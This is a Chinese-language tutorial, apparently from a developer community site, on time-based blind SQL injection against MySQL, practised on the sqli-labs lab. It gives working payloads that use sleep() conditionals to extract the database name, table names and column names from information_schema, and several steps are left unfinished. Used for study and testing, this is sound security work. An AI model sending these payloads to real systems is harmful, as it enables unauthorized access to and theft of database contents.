时间盲注

2022-08-23 446

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 延迟注入，是一种盲注的手法, 提交对执行时间铭感的函数sql语句，通过执行时间的长短来判断是否执行成功，比如:正确的话会导致时间很长，错误的话会导致执行时间很短，这就是所谓的高级盲注.SQLMAP。

时间盲注

时间盲注简介

延迟注入，是一种盲注的手法, 提交对执行时间铭感的函数sql语句，通过执行时间的长短来判断是否执行成功，比如:正确的话会导致时间很长，错误的话会导致执行时间很短，这就是所谓的高级盲注。

时间盲注所用的函数

sleep() //延迟函数

if(condition,true,false) //条件语句

ascii() //转换成ascii码

substring("string",strart,length) //mid()也一样，取出字符串里的第几位开始，长度多少的字符

if(expr1,expr2,expr3) //如果 expr1 是TRUE，则 If()的返回值为expr2; 否则返回值则为 expr3

Length //返回长度函数

靶场利用

可以利用sqli-labs-master/less-9 进行时间盲注

时间盲注工具利用

打开浏览器的开发者工具(快捷键F12)，点击其中的网络，可以查看站点的反应时间。

时间盲注思路总结

注意括号闭合

判断站点是否存在回显|注入|错误提示 --> 利用字符型|整数型判断

判断站点是否存在时间盲注 --> 字符型：' and sleep(5) %23

--> 数字型：and sleep(5) %23

判断站点的数据库长度 --> and if((length(database())>7),sleep(5),1)) %23

判断站点的数据库名 --> and if((ascii(substr(database(),1,1))=100),sleep(5),1) %23

判断表的个数 --> and if((select count(*) from information_schema.tables where table_schema='库名')=5,sleep(5),1) %23

依次判断表名长度 --> and if((length((select table_name from information_schema.tables where table_schema='库名' limit 0,1))>5),sleep(5),1) %23

依次判断表名 --> and if(ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1),1,1)),sleep(5),1) %23

依次判断表中的字段数量 -->

依次判断表中的字段名长度 --> and if(length((select column_name from information_schema.columns where table_name='表名' and table_schema='库名' limit 0,1))>5,sleep(5),1) %23

依次判断表中的字段名 -->

依次判断表中数据的长度 -->

依次判断表中数据 -->

别问问就是懒得写了

时间盲注

时间盲注

时间盲注简介

时间盲注所用的函数

靶场利用

时间盲注工具利用

时间盲注思路总结

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

时间盲注

时间盲注

时间盲注简介

时间盲注所用的函数

靶场利用

时间盲注工具利用

时间盲注思路总结

热门文章

最新文章

相关电子书